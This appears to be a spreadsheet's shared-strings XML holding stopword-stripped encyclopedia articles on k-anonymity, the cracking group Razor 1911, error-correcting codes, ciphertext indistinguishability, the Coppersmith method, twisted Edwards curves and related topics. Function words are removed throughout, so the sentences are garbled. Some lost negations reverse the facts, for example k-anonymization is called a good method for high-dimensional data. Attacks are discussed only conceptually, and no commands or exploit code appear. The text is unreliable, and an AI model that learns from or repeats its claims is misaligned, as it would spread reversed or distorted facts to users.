attributes found table always least rows exact attributes. attributes available adversary called quasi-identifiers. each quasi-identifier tuple occurs least records dataset k-anonymity.meyerson williams (2004) demonstrated optimal k-anonymity np-hard problem, however heuristic methods k-optimize given bayardo agrawal (2005) often yield effective results. practical approximation algorithm enables solving k-anonymization problem approximation guarantee {\displaystyle o(\log presented kenig tassa. possible attacks while k-anonymity promising approach take group based anonymization given simplicity wide array algorithms perform however susceptible many attacks. when background knowledge available attacker, attacks become even effective. such attacks include: homogeneity attack: this attack leverages case values sensitive value within records identical. cases, even though data k-anonymized, sensitive value records exactly predicted. background knowledge attack: this attack leverages association quasi-identifier attributes sensitive attribute reduce possible values sensitive attribute. example, machanavajjhala, kifer, gehrke, venkitasubramaniam (2007) showed knowing heart attacks occur reduced rate japanese patients could used narrow range values sensitive attribute patient's disease. caveats because k-anonymization include randomization, attackers still make inferences data sets harm individuals. example, 19-year-old john kerala known database above, reliably said either cancer, heart-related disease, viral infection. k-anonymization good method anonymize high-dimensional datasets. example, researchers showed that, given locations, unicity mobile phone timestamp-location datasets {\displaystyle {\mathcal {e}}_{4}} k-anonymity {\displaystyle k=1} high 95%.it also shown k-anonymity skew results data disproportionately suppresses generalizes data points unrepresentative characteristics. suppression generalization algorithms used k-anonymize datasets altered, however, skewing effect. hash-based k-anonymity hash-based k-anonymity largely developed junade ali, initially preventing compromised credential checking later real-time anonymization addresses.this approach works taking cryptographic hash dimensional data truncating hash least {\displaystyle k-1} hash collisions. this approach allows efficient anonymized searching large datasets, breached passwords. this approach used provide formally demonstrable level anonymity privacy-sensitive data, allowing precise trade-off made information leakage functionality (such address anonymization). also t-closeness l-diversity differential privacy references</t>
  </si>
  <si>
    <t>Razor 1911</t>
  </si>
  <si>
    <t>razor 1911 (rzr) warez demogroup founded norway, 1986. first ever group initially founded exclusively demogroup, moving warez 1987. according justice department, razor 1911 oldest software cracking group still active internet. razor 1911 diskmag 'propaganda' 1995. history group founded razor 2992 doctor insane sector9 norway october 1985 commodore software cracking group. shortly after, changed 2992 1911 translates hexadecimal. between 1987 1988 group began move away commodore migrated hardware platform, coding demos cracking games amiga. early 1990s razor 1911 made another transition, time foremost cracking group, still continuing release cracktro loaders, demos music. razor supply group diskette 1992 diskettes abandoned cd-roms. throughout 1990s razor faced competition many different groups, ranging groups tristar sector inc. (trsi), international network crackers (inc) fairlight (flt) 1994 prestige, hybrid (hbd), others 1995. razor revitalised members gained another group, nexus, brought suppliers leaders speed racer (tsr), tuna gecko. razor handful others throughout 1990s, zodact, romkernel, renegade chemist (trc), witch king, butcher, switch, marauder, randall flagg. razor 1911 took break demoscene 1992. 1993 demogroup calling razor 1911 formed, colorbird original member razor 1911. razor 1911 still active software cracking group.in 1995 diskette releases rapidly supplanted cd-roms, razor 1911 moved cd-ripping scene. crew razor chapter included members tsr, pharaoh, fatal error, grizzly, suspicious image, third son, tuna, beowulf, pitbull, bunter, manhunter, niteman, vitas, mausioso punisher. razor took challenge scene formed. razor 1911 began release isos became standard day, significantly punisher. instrumental razor's recovery solid performance scene. following punisher's retirement, razor various different people underwent internal problems form leadership challenges. this solved pitbull, razor member 1990s, took leadership role. claimed still leader razor time "operation buccaneer", international anti-piracy operation raids homes piracy suspects worldwide 2001, carried even though nfos scene activity time points renegade chemist actual leader group. return june 2006, razor 1911 started releasing games again. they releasing games fairly consistently ever since, 2010 among prolific groups cracking releases.on april 2011, razor 1911 "cracked" show 101% french channel nolife, inducing many unwanted "bugs" behaviors show. while joke, intro contained real code giving unlimited access paid replay service days.on april 2011, razor 1911's demo division public choice award scene.org awards ceremony gathering intro "insert coins" coded music dubmood. members dycus, member razor 1911, died cancer 2012. also list warez groups warez group references external links razor 1911 demo division website</t>
  </si>
  <si>
    <t>Repeat-accumulate code</t>
  </si>
  <si>
    <t>computer science, repeat-accumulate codes codes) complexity class error-correcting codes. they devised ensemble weight distributions easy derive. codes introduced divsalar code, information block length {\displaystyle {n}} repeated {\displaystyle {q}} times, scrambled interleaver size {\displaystyle {qn}} encoded rate accumulator. accumulator viewed truncated rate recursive convolutional encoder transfer function {\displaystyle {1/(1+d)}} divsalar prefer think block code whose input block {\displaystyle {(z_{1},\ldots ,z_{n})}} output block {\displaystyle {(x_{1},\ldots ,x_{n})}} related formula {\displaystyle {x_{1}=z_{1}}} {\displaystyle x_{i}=x_{i-1}+z_{i}} {\displaystyle i&gt;1} encoding time codes linear rate {\displaystyle 1/q} they nonsystematic. irregular repeat accumulate codes irregular repeat accumulate (ira) codes build ideas codes. replaces outer code code density generator matrix code. codes first repeats information bits different times, accumulates subsets repeated bits generate parity bits. irregular degree profile information nodes, together degree profile check nodes, designed using density evolution. systematic codes considered form ldpc code. litigation whether dvb-s2 ldpc code form code ongoing. patents 7,116,710; 7,421,032; 7,916,781; 8,284,833 issue. notes references divsalar, jin, mceliece. "coding theorems ‘turbo-like’ codes." proc. 36th allerton conf. communication, control computing, allerton, illinois, sept. 1998, 201–210. external links iterative error correction: turbo, low-density parity-check, repeat-accumulate codes</t>
  </si>
  <si>
    <t>Ciphertext expansion</t>
  </si>
  <si>
    <t>cryptography, term ciphertext expansion refers length increase message encrypted. many modern cryptosystems cause degree expansion encryption process, instance resulting ciphertext must include message-unique initialization vector (iv). probabilistic encryption schemes cause ciphertext expansion, possible ciphertexts necessarily greater input plaintexts. certain schemes, cocks identity based encryption, goldwasser-micali cryptosystem result ciphertexts hundreds thousands times longer plaintext. ciphertext expansion offset increased processes compress expand message, e.g., data compression error correction coding. references</t>
  </si>
  <si>
    <t>Ciphertext indistinguishability</t>
  </si>
  <si>
    <t>ciphertext indistinguishability property many encryption schemes. intuitively, cryptosystem possesses property indistinguishability, adversary unable distinguish pairs ciphertexts based message encrypt. property indistinguishability chosen plaintext attack considered basic requirement provably secure public cryptosystems, though schemes also provide indistinguishability chosen ciphertext attack adaptive chosen ciphertext attack. indistinguishability chosen plaintext attack equivalent property semantic security, many cryptographic proofs definitions interchangeably. cryptosystem considered secure terms indistinguishability adversary, given encryption message randomly chosen two-element message space determined adversary, identify message choice probability significantly better random guessing (1⁄2). adversary succeed distinguishing chosen ciphertext probability significantly greater 1⁄2, adversary considered "advantage" distinguishing ciphertext, scheme considered secure terms indistinguishability. this definition encompasses notion secure scheme, adversary learn information seeing ciphertext. therefore, adversary able better guessed randomly. formal definitions security terms indistinguishability many definitions, depending assumptions made capabilities attacker. normally presented game, cryptosystem considered secure adversary game significantly greater probability adversary must guess randomly. common definitions used cryptography indistinguishability chosen plaintext attack (abbreviated ind-cpa), indistinguishability (non-adaptive) chosen ciphertext attack (ind-cca1), indistinguishability adaptive chosen ciphertext attack (ind-cca2). security either latter definition implies security previous ones: scheme ind-cca1 secure also ind-cpa secure, scheme ind-cca2 secure ind-cca1 ind-cpa secure. thus, ind-cca2 strongest three definitions security. indistinguishability chosen-plaintext attack (ind-cpa) probabilistic asymmetric encryption algorithm, indistinguishability chosen plaintext attack (ind-cpa) defined following game adversary challenger. schemes based computational security, adversary modeled probabilistic polynomial time turing machine, meaning must complete game output guess within polynomial number time steps. definition e(pk, represents encryption message challenger generates pair based security parameter (e.g., size bits), publishes adversary. challenger retains adversary perform polynomially bounded number encryptions operations. eventually, adversary submits distinct chosen plaintexts {\displaystyle \scriptstyle m_{0},m_{1}} challenger. challenger selects {\displaystyle \scriptstyle uniformly random, sends challenge ciphertext e(pk, {\displaystyle \scriptstyle m_{b}} back adversary. adversary free perform number additional computations encryptions. finally, adversary outputs guess value cryptosystem indistinguishable chosen plaintext attack every probabilistic polynomial time adversary negligible "advantage" random guessing. adversary said negligible "advantage" wins game probability {\displaystyle \scriptstyle \left({\frac {1}{2}}\right)\,+\,\epsilon (k)} {\displaystyle \scriptstyle \epsilon (k)} negligible function security parameter every (nonzero) polynomial function {\displaystyle \scriptstyle poly()} exists {\displaystyle \scriptstyle k_{0}} {\displaystyle \scriptstyle |\epsilon (k)|\;&lt;\;\left|{\frac {1}{poly(k)}}\right|} {\displaystyle \scriptstyle k\;&gt;\;k_{0}} although adversary knows {\displaystyle \scriptstyle m_{0}} {\displaystyle \scriptstyle m_{1}} probabilistic nature means encryption {\displaystyle \scriptstyle m_{b}} many valid ciphertexts, therefore encrypting {\displaystyle \scriptstyle m_{0}} {\displaystyle \scriptstyle m_{1}} comparing resulting ciphertexts challenge ciphertext afford non-negligible advantage adversary. while definition specific asymmetric cryptosystem, adapted symmetric case replacing public encryption function encryption oracle, retains secret encryption encrypts arbitrary plaintexts adversary's request. symmetric ind-cpa game, formalized adversarial process performing chosen-plaintext attack usually outlined form cryptographic game. test symmetric ind-cpa, game described defined. {\displaystyle {\mathcal {k}}} generation function, {\displaystyle {\mathcal {e}}} encryption function, {\displaystyle {\mathcal {d}}} decryption function. {\displaystyle {\mathcal {s}}{\mathcal {e}}=({\mathcal {k}},{\mathcal {e}},{\mathcal {d}})} symmetric encryption scheme. game {\displaystyle guess} defined many times would like, adversary selects plaintext messages choosing provides oracle returns ciphertext encrypting messages. adversary's advantage determined probability guessing value value chosen random beginning game determines message encrypted oracle. therefore, advantage defined indistinguishability chosen ciphertext attack/adaptive chosen ciphertext attack (ind-cca1, ind-cca2) indistinguishability non-adaptive adaptive chosen ciphertext attack (ind-cca1, ind-cca2) uses definition similar ind-cpa. however, addition public encryption oracle, symmetric case), adversary given access decryption oracle decrypts arbitrary ciphertexts adversary's request, returning plaintext. non-adaptive definition, adversary allowed query oracle receives challenge ciphertext. adaptive definition, adversary continue query decryption oracle even received challenge ciphertext, caveat pass challenge ciphertext decryption (otherwise, definition would trivial). challenger generates pair based security parameter (e.g., size bits), publishes adversary. challenger retains adversary perform number encryptions, calls decryption oracle based arbitrary ciphertexts, operations. eventually, adversary submits distinct chosen plaintexts {\displaystyle \scriptstyle m_{0},\,m_{1}} challenger. challenger selects uniformly random, sends "challenge" ciphertext e(pk, {\displaystyle \scriptstyle m_{b}} back adversary. adversary free perform number additional computations encryptions. non-adaptive case (ind-cca1), adversary make calls decryption oracle. adaptive case (ind-cca2), adversary make calls decryption oracle, submit challenge ciphertext finally, adversary outputs guess value scheme ind-cca1/ind-cca2 secure adversary non-negligible advantage winning game. indistinguishable random noise sometimes need encryption schemes ciphertext string indistinguishable random string adversary.if adversary unable tell message even exists, gives person wrote message plausible deniability. some people building encrypted communication links prefer make contents encrypted datagram indistinguishable random data, order make traffic analysis difficult.some people building systems store encrypted data prefer make data indistinguishable random data order make data hiding easier. example, kinds disk encryption truecrypt attempt hide data innocent random data left kinds data erasure. another example, kinds steganography attempt hide data making match statistical characteristics innocent "random" image noise digital photos. support deniable encryption systems, cryptographic algorithms specifically designed make ciphertext messages indistinguishable random strings.most applications require encryption algorithm produce encrypted messages indistinguishable random bits. however, authors consider encryption algorithms conceptually simpler easier work with, versatile practice—and ind-cpa encryption algorithms apparently fact, produce encrypted messages indistinguishable random bits. equivalences implications indistinguishability important property maintaining confidentiality encrypted communications. however, property indistinguishability cases found imply other, apparently unrelated security properties. sometimes implications directions, making definitions equivalent; example, known property indistinguishability adaptive chosen ciphertext attack (ind-cca2) equivalent property non-malleability attack scenario (nm-cca2). this equivalence immediately obvious, non-malleability property dealing message integrity, rather confidentiality. cases, demonstrated indistinguishability combined certain definitions, order imply still useful definitions, vice versa. following list summarizes known implications, though means complete. notation {\displaystyle \scriptstyle a\;\rightarrow \;b} means property implies property {\displaystyle \scriptstyle a\;\leftrightarrow \;b} means properties equivalent. {\displaystyle \scriptstyle a\;\not \rightarrow \;b} means property necessarily imply property ind-cpa {\displaystyle \scriptstyle \leftrightarrow semantic security cpa. nm-cpa (non-malleability chosen plaintext attack) {\displaystyle \scriptstyle \rightarrow ind-cpa. nm-cpa (non-malleability chosen plaintext attack) {\displaystyle \scriptstyle \not \rightarrow ind-cca2. nm-cca2 (non-malleability adaptive chosen ciphertext attack) {\displaystyle \scriptstyle \leftrightarrow ind-cca2. also distinguishing attack computational indistinguishability chosen ciphertext attack adaptive chosen ciphertext attack references katz, jonathan; lindell, yehuda (2007). introduction modern cryptography: principles protocols. chapman hall press. isbn 978-1584885511.</t>
  </si>
  <si>
    <t>Naughty Ones</t>
  </si>
  <si>
    <t>naughty ones platform game amiga amiga cd32. released interactivision early 1994. programmed jacob gorm hansen (paleface) graphics done henrik mikkelsen (seen), demo group melon dezign. external links naughty ones lemon amiga naughty ones amiga hall light</t>
  </si>
  <si>
    <t>Repetition code</t>
  </si>
  <si>
    <t>coding theory, repetition code basic error-correcting codes. order transmit message noisy channel corrupt transmission places, idea repetition code repeat message several times. hope channel corrupts minority repetitions. this receiver notice transmission error occurred since received data stream repetition single message, moreover, receiver recover original message looking received message data stream occurs often. because error correcting performance coupled code rate (ratio useful information symbols actual transmitted symbols), error correction codes preferred cases. chief attraction repetition code ease implementation. code parameters case binary repetition code, exist code words ones zeros length {\displaystyle therefore, minimum hamming distance code equals length {\displaystyle this gives repetition code error correcting capacity {\displaystyle {\tfrac {n-1}{2}}} (i.e. correct {\displaystyle {\tfrac {n-1}{2}}} errors code word). length binary repetition code odd, perfect code. binary repetition code length equivalent (n,1)-hamming code. example consider binary repetition code length user wants transmit information bits 101. then encoding maps either ones zeros code word, 111, transmitted. let's three errors corrupt transmitted bits received sequence 100. decoding usually done simple majority decision code word. that lead decoded information bits, first second code word occurred less errors, majority bits correct. third code word bits corrupted, results erroneous information bit, since errors error correcting capacity. applications despite poor performance stand-alone codes, turbo code-like iteratively decoded concatenated coding schemes, repeat-accumulate (ra) accumulate-repeat-accumulate (ara) codes, allows surprisingly good error correction performance. repetition codes known codes whose code rate automatically adjusted varying channel capacity, sending less parity information required overcome channel noise, code known non-erasure channels. practical adaptive codes erasure channels invented recently, known fountain codes. some uarts, ones used flexray protocol, majority filter ignore brief noise spikes. this spike-rejection filter seen kind repetition decoder. also block code turbo code references</t>
  </si>
  <si>
    <t>Self-shrinking generator</t>
  </si>
  <si>
    <t>self-shrinking generator pseudorandom generator based shrinking generator concept. variants self-shrinking generator based linear-feedback shift register (lfsr) studied cryptography. algorithm difference shrinking generator, uses second feedback shift register control output first, self-shrinking generator uses alternating output bits single register control final output. procedure clocking kind generator follows: clock lfsr twice obtain pair bits lfsr output. pair output zero. pair output one. otherwise, output nothing. return step one. example this example connection polynomial initial register fill below table lists, iteration lfsr, intermediate output self-shrinking, well final generator output. positions defined connection polynomial marked blue headings. state zeroth iteration represents initial input. four iterations, following sequence intermediate bits produced: 0110. first pair bits, discarded since match either second pair bits, matches second step algorithm zero output. more bits created continuing clock lfsr shrinking output described above. cryptanalysis paper, meier steffelbach prove lfsr-based self-shrinking generator connection polynomial length results output sequence period least 2l/2, linear complexity least 2l/2-1. furthermore, show self-shrinking generator represented shrinking-generator. inverse also true: shrinking generator implemented self-shrinking generator, although resultant generator maximal length. attack presented authors requires 20.7l steps, assuming known connection polynomial. advanced attack, discovered mihaljević, able break register hundred bits length around steps, using output sequence bits. another attack references further reading handbook applied cryptography</t>
  </si>
  <si>
    <t>Just-in-time blocking</t>
  </si>
  <si>
    <t>just-in-time blocking practice temporarily blocking internet access people specific geographic area, prevent accessing information communicating other.the first known instance just-in-time blocking documented opennet initiative 2005 kyrgyz parliamentary elections. it's also observed 2006 belarus presidential elections, 2006 tajik presidential elections, alleged taken place bahrain, uganda, yemen, 2006 presidential parliamentary elections. 2016, internet watchdog organization turkey blocks identified separate regional internet shutdowns commencing prior arrests mayors predominantly kurdish southeast turkey, measure believed implemented government prevent protests limit critical media coverage.in two-week period leading 2013 iranian presidential elections, anti-censorship groups herdict asl19 found access popular websites facebook, meyar news, twitter, youtube intermittently blocked iran. mohammad hassan nami, iran's minister communications information technology, told tasnim news agency restrictions part “security measures taken preserve calm country election period." references</t>
  </si>
  <si>
    <t>Coppersmith method</t>
  </si>
  <si>
    <t>coppersmith method, proposed coppersmith, method find small integer zeroes univariate bivariate polynomials modulo given integer. method uses lenstra–lenstra–lovász lattice basis reduction algorithm (lll) find polynomial zeroes target polynomial smaller coefficients. cryptography, coppersmith method mainly used attacks parts secret known forms base coppersmith's attack. approach coppersmith's approach reduction solving modular polynomial equations solving polynomials integers. {\displaystyle f(x)=x^{n}+a_{n-1}x^{n-1}+\ldots +a_{1}x+a_{0}} assume {\displaystyle f(x_{0})\equiv 0{\pmod {m}}} integer {\displaystyle |x_{0}|&lt;m^{1/n}} coppersmith’s algorithm used find integer solution {\displaystyle x_{0}} finding roots easy using, e.g., newton's method, algorithm work modulo composite number idea behind coppersmith’s method find different polynomial related root {\displaystyle x_{0}} modulo small coefficients. coefficients {\displaystyle x_{0}} small enough {\displaystyle |f(x_{0})|&lt;m} integers, {\displaystyle f(x_{0})=0} {\displaystyle x_{0}} root found easily. more generally, find polynomial {\displaystyle f(x)} root {\displaystyle x_{0}} modulo power {\displaystyle m^{a}} satisfying {\displaystyle |f(x_{0})|&lt;m^{a}} solve {\displaystyle x_{0}} above. coppersmith's algorithm uses lenstra–lenstra–lovász lattice basis reduction algorithm (lll) construct polynomial small coefficients. given algorithm constructs polynomials {\displaystyle p_{1}(x),p_{2}(x),\dots ,p_{n}(x)} root {\displaystyle x_{0}} modulo {\displaystyle m^{a}} integer chosen based degree size {\displaystyle x_{0}} linear combination polynomials also {\displaystyle x_{0}} root modulo {\displaystyle m^{a}} next step algorithm construct linear combination {\displaystyle f(x)=\sum c_{i}p_{i}(x)} {\displaystyle p_{i}(x)} inequality {\displaystyle |f(x_{0})|&lt;m^{a}} holds. standard factorization methods calculate zeroes {\displaystyle f(x)} integers. implementations coppersmith's method univariate polynomials implemented magma function smallroots; pari/gp function zncoppersmith; sagemath method small_roots. references coppersmith, (1996). "finding small root univariate modular equation". lecture notes computer science. 1070: 155–165. doi:10.1007/3-540-68339-9_14. isbn 978-3-540-61186-8. coppersmith, (1996). "finding small root bivariate integer equation; factoring high bits known". lecture notes computer science. 1070: 178–189. doi:10.1007/3-540-68339-9_16. isbn 978-3-540-61186-8. coron, (2004). "finding small roots bivariate integer polynomial equations revisited" (pdf). lecture notes computer science. 3027: 492–505. doi:10.1007/978-3-540-24676-3_29. bauer, joux, (2007). "toward rigorous variation coppersmith's algorithm three variables". lecture notes computer science. 4515: 361–378. doi:10.1007/978-3-540-72540-4_21. isbn 978-3-540-72539-8. coron, (2007). "finding small roots bivariate integer polynomial equations: direct approach" (pdf). lecture notes computer science. 4622: 379–394. doi:10.1007/978-3-540-74143-5_21.</t>
  </si>
  <si>
    <t>Introduction to the Theory of Error-Correcting Codes</t>
  </si>
  <si>
    <t>introduction theory error-correcting codes textbook error-correcting codes, vera pless. published 1982 john wiley sons, second edition 1989 third 1998. basic library list committee mathematical association america rated book essential inclusion undergraduate mathematics libraries. topics this book mainly centered around algebraic combinatorial techniques designing using error-correcting linear block codes. differs previous works area reduction result mathematical foundations, clear exposition results follow foundations.the first chapters present background introductory material, including hamming distance, decoding methods including maximum likelihood syndromes, sphere packing hamming bound, singleton bound, gilbert–varshamov bound, hamming(7,4) code. they also include brief discussions additional material covered detail later, including information theory, convolutional codes, burst error-correcting codes. chapter presents code field {\displaystyle gf(2^{4})} chapter develops theory finite fields generally.chapter studies cyclic codes chapter studies special case cyclic codes, quadratic residue codes. chapter returns codes. after discussions specific codes, next chapter concerns enumerator polynomials, including macwilliams identities, pless's power moment identities, gleason polynomials. final chapters connect material theory combinatorial designs design experiments, include material assmus–mattson theorem, witt design, binary golay codes, ternary golay codes.the second edition adds material codes, reed–solomon error correction, reed–muller codes, decoding golay codes, new, simple combinatorial proof macwilliams identities". well correcting errors adding exercises, third edition includes material connections greedily constructed lexicographic codes combinatorial game theory, griesmer bound, non-linear codes, gray images {\displaystyle \mathbb ^{4}} codes. audience reception this book written textbook advanced undergraduates; reviewer calls leisurely introduction field time mathematically rigorous". includes problems, read mathematically-inclined students background linear algebra (provided appendix) prior knowledge coding theory.reviewer blake complained first edition omitted topics necessary engineers, including algebraic decoding, goppa codes, reed–solomon error correction, performance analysis, making appropriate mathematics courses, suggests could still used basis engineering course replacing last chapters material, overall calls book delightful little monograph". reviewer john baylis adds "for clearly exhibiting coding theory showpiece applied modern algebra seen beat one". related reading other books area include theory error-correcting codes (1977) jessie macwilliams neil sloane, first course coding theory (1988) raymond hill. references external links introduction theory error-correcting codes (2nd ed.) internet archive</t>
  </si>
  <si>
    <t>Twisted Edwards curve</t>
  </si>
  <si>
    <t>algebraic geometry, twisted edwards curves plane models elliptic curves, generalisation edwards curves introduced bernstein, birkner, joye, lange peters 2008. curve named mathematician harold edwards. elliptic curves important public cryptography twisted edwards curves heart electronic signature scheme called eddsa offers high performance avoiding security problems surfaced digital signature schemes. definition each twisted edwards curve twist edwards curve. twisted edwards curve {\displaystyle e_{e_{a,d}}} field {\displaystyle \mathbb char {\displaystyle \operatorname {char} (\mathbb )\neq affine plane curve defined equation: {\displaystyle e_{e_{a,d}}:ax^{2}+y^{2}=1+dx^{2}y^{2}} {\displaystyle a,d} distinct non-zero elements {\displaystyle \mathbb special case {\displaystyle a=1} untwisted, curve reduces ordinary edwards curve. every twisted edwards curve birationally equivalent elliptic curve montgomery form vice versa. group elliptic curves, also twisted edwards curve, possible operations points, adding doubling tripling) one. results operations always points belong curve itself. following sections formulas given obtain coordinates point resulted addition points (addition), coordinates point resulted doubling single point curve. addition twisted edwards curves {\displaystyle \mathbb field characteristic different {\displaystyle (x_{1},y_{1})} {\displaystyle (x_{2},y_{2})} points twisted edwards curve. equation twisted edwards curve written ee,a,d: {\displaystyle ax^{2}+y^{2}=1+dx^{2}y^{2}} .the points {\displaystyle (x_{1},y_{1}),(x_{2},y_{2})} ee,a,d {\displaystyle (x_{1},y_{1})+(x_{2},y_{2})=\left({\frac {x_{1}y_{2}+y_{1}x_{2}}{1+dx_{1}x_{2}y_{1}y_{2}}},{\frac {y_{1}y_{2}-ax_{1}x_{2}}{1-dx_{1}x_{2}y_{1}y_{2}}}\right)} neutral element (0,1) negative {\displaystyle (x_{1},y_{1})} {\displaystyle (-x_{1},y_{1})} these formulas also work doubling. square {\displaystyle \mathbb non-square {\displaystyle \mathbb formulas complete: means used pairs points without exceptions; work doubling well, neutral elements negatives accepted inputs.example addition given following twisted edwards curve {\displaystyle 3x^{2}+y^{2}=1+2x^{2}y^{2}} possible points {\displaystyle p_{1}=(1,{\sqrt {2}})} {\displaystyle p_{2}=(1,-{\sqrt {2}})} using formula given above. result point coordinates: {\displaystyle x_{3}={\frac {x_{1}y_{2}+y_{1}x_{2}}{1+dx_{1}x_{2}y_{1}y_{2}}}=0,} {\displaystyle y_{3}={\frac {y_{1}y_{2}-ax_{1}x_{2}}{1-dx_{1}x_{2}y_{1}y_{2}}}=-1.} doubling twisted edwards curves doubling performed exactly formula addition. doubling point {\displaystyle (x_{1},y_{1})} curve ea,d {\displaystyle 2(x_{1},y_{1})=(x_{3},y_{3})} {\displaystyle {\begin{aligned}x_{3}&amp;={\frac {x_{1}y_{1}+y_{1}x_{1}}{1+dx_{1}x_{1}y_{1}y_{1}}}={\frac {2x_{1}y_{1}}{ax_{1}^{2}+y_{1}^{2}}}\\[6pt]y_{3}&amp;={\frac {y_{1}y_{1}-ax_{1}x_{1}}{1-dx_{1}x_{1}y_{1}y_{1}}}={\frac {y_{1}^{2}-ax_{1}^{2}}{2-ax_{1}^{2}-y_{1}^{2}}}.\end{aligned}}} denominators doubling simplified using curve equation {\displaystyle dx^{2}y^{2}=ax^{2}+by^{2}-1} this reduces power allows efficient computation. example doubling considering twisted edwards curve given previous example, d=2, possible double point {\displaystyle p_{1}=(1,{\sqrt {2}})} point obtained using formula following coordinates: {\displaystyle x_{3}={\frac {2x_{1}y_{1}}{ax_{1}^{2}+y_{1}^{2}}}={\frac {2{\sqrt {2}}}{5}},} {\displaystyle y_{3}={\frac {y_{1}^{2}-ax_{1}^{2}}{2-ax_{1}^{2}-y_{1}^{2}}}={\frac {1}{3}}.} easy see, little computations, point {\displaystyle p_{3}=\left({\frac {2{\sqrt {2}}}{5}},{\frac {1}{3}}\right)} belongs curve {\displaystyle 3x^{2}+y^{2}=1+2x^{2}y^{2}} extended coordinates there another kind coordinate system point twisted edwards curves represented. point {\displaystyle (x,y,z)} {\displaystyle ax^{2}+y^{2}=1+dx^{2}y^{2}} represented satisfying following equations x/z, y/z, t/z. coordinates point (x:y:z:t) called extended twisted edwards coordinates. identity element represented (0:1:1:0). negative point (−x:y:z:−t). inverted twisted edwards coordinates coordinates point {\displaystyle (x_{1}:y_{1}:z_{1})} called inverted twisted edwards coordinates curve {\textstyle (x^{2}+ay^{2})z^{2}=x^{2}y^{2}+dz^{4}} {\textstyle x_{1}y_{1}z_{1}\neq point affine {\displaystyle (z_{1}/x_{1},z_{1}/y_{1})} ee,a,d. bernstein lange introduced inverted coordinates, case observed coordinates save time addition. projective twisted edwards coordinates equation projective twisted edwards curve given {\displaystyle (ax^{2}+y^{2})z^{2}=z^{4}+dx^{2}y^{2}} point (x1:y1:z1) represents affine point x1/z1, y1/z1) ee,a,d. expressing elliptic curve twisted edwards form saves time arithmetic, even curve expressed edwards form. addition projective twisted curves addition projective twisted edwards curve given (x3:y3:z3) (x1:y1:z1) (x2:y2:z2)and costs 10multiplications 1squaring additions, multiplication algorithma f((x1 doubling projective twisted curves doubling projective twisted curve given (x3:y3:z3) 2(x1:y1:z1).this costs 3multiplications 4squarings 7additions, multiplication algorithm y1)2 d).j also eddsa information running time required specific case, table costs operations elliptic curves. notes references daniel bernstein; marc joye; tanja lange; peter birkner; christiane peters, twisted edwards curves (pdf)huseyin hisil, kenneth wong, gary carter, dawson., twisted edwards curves revisited{{citation}}: maint: multiple names: authors list (link)daniel bernstein; tanja lange; peter birkner; christiane peters, using edwards curves (pdf) external links http://hyperelliptic.org/efd/g1p/index.html http://hyperelliptic.org/efd/g1p/auto-twisted.html ed25519 algorithm: http://ed25519.cr.yp.to/</t>
  </si>
  <si>
    <t>Contact analysis</t>
  </si>
  <si>
    <t>cryptanalysis, contact analysis study frequency certain symbols precede follow symbols. method used breaking classical ciphers. contact analysis based fact that, sample written language, certain symbols appear adjacent symbols varying frequencies. moreover, frequencies roughly almost samples language, even distribution symbols differs significantly normal. this true regardless whether symbols used words letters. ciphers, properties natural language plaintext preserved ciphertext, potential exploited ciphertext-only attack. although sense contact analysis considered type frequency analysis, discussions frequency analysis concern simple probabilities symbols text: {\displaystyle p(x_{i}=a)} {\displaystyle p(x_{i}=a\cap x_{i+1}=b)} contact analysis based conditional probability certain letters precede succeed letters: {\displaystyle p(x_{i}=b\mid x_{i-1}=a)} {\displaystyle p(x_{i}=c\mid x_{i-2}=a\cap x_{i-1}=b)} even {\displaystyle p(x_{i}\subset s\mid x_{i-1}\subset t\cap x_{i+1}\subset {\displaystyle {\displaystyle subsets alphabet used. where frequency analysis based first-order statistics, contact analysis based second third-order statistics. external links statistical distributions english text</t>
  </si>
  <si>
    <t>Constant-weight code</t>
  </si>
  <si>
    <t>coding theory, constant-weight code, also called m-of-n code, error detection correction code codewords share hamming weight. one-hot code balanced code widely used kinds constant-weight code. theory closely connected designs (such t-designs steiner systems). most work field discrete mathematics concerned binary constant-weight codes. binary constant-weight codes several applications, including frequency hopping networks. most barcodes binary constant-weight code simplify automatically setting brightness threshold distinguishes black white stripes. most line codes either constant-weight code, nearly-constant-weight paired disparity code. addition error correction codes, large space code words also used design asynchronous circuits delay insensitive circuits. constant-weight codes, like berger codes, detect unidirectional errors. a(n, central problem regarding constant-weight codes following: maximum number codewords binary constant-weight code length {\displaystyle hamming distance {\displaystyle weight {\displaystyle this number called {\displaystyle a(n,d,w)} apart trivial observations, generally impossible compute numbers straightforward way. upper bounds given several important theorems first second johnson bounds, better upper bounds sometimes found ways. lower bounds often found exhibiting specific codes, either variety methods discrete mathematics, heavy computer searching. large table record-breaking codes published 1990, extension longer codes (but values {\displaystyle {\displaystyle relevant application) published 2006. 1-of-n codes special case constant weight codes one-of-n codes, encode {\displaystyle \log _{2}n} bits code-word {\displaystyle bits. one-of-two code uses code words encode bits '1'. one-of-four code words 0001, 0010, 0100, 1000 order encode bits example dual rail encoding, chain link used delay insensitive circuits. codes, {\displaystyle n=n,~d=2,~w=1} {\displaystyle a(n,d,w)=n} some notable uses one-hot codes include biphase mark code uses 1-of-2 code; pulse-position modulation uses 1-of-n code; address decoder, etc. balanced code coding theory, balanced code binary forward error correction code codeword contains equal number zero bits. balanced codes introduced donald knuth; subset so-called unordered codes, codes property positions ones codeword never subset positions ones another codeword. like unordered codes, balanced codes suitable detection unidirectional errors encoded message. balanced codes allow particularly efficient decoding, carried parallel.some notable uses balanced-weight codes include biphase mark code uses code; 6b/8b encoding uses code; hadamard code {\displaystyle 2^{k-1}} {\displaystyle 2^{k}} code (except zero codeword), three-of-six code; etc. 3-wire lane encoding used mipi c-phy considered generalization constant-weight code ternary wire transmits ternary signal, instant wires transmitting low, transmitting middle, transmitting high signal. m-of-n codes m-of-n code separable error detection code code word length bits, code word contains exactly instances "one". single error cause code word either "ones". example m-of-n code 2-of-5 code used united states postal service. simplest implementation append string ones original data contains ones, append zeros create code length example: some notable uses constant-weight codes, one-hot balanced-weight codes already mentioned above, include code uses 3-of-9 code; bi-quinary coded decimal code uses 2-of-7 code, 2-of-5 code, etc. references external links table lower bounds {\displaystyle a(n,d,w)} maintained andries brouwer (update earlier table neil sloane rains) table upper bounds {\displaystyle a(n,d,w)} maintained erik agrell</t>
  </si>
  <si>
    <t>Consensus (computer science)</t>
  </si>
  <si>
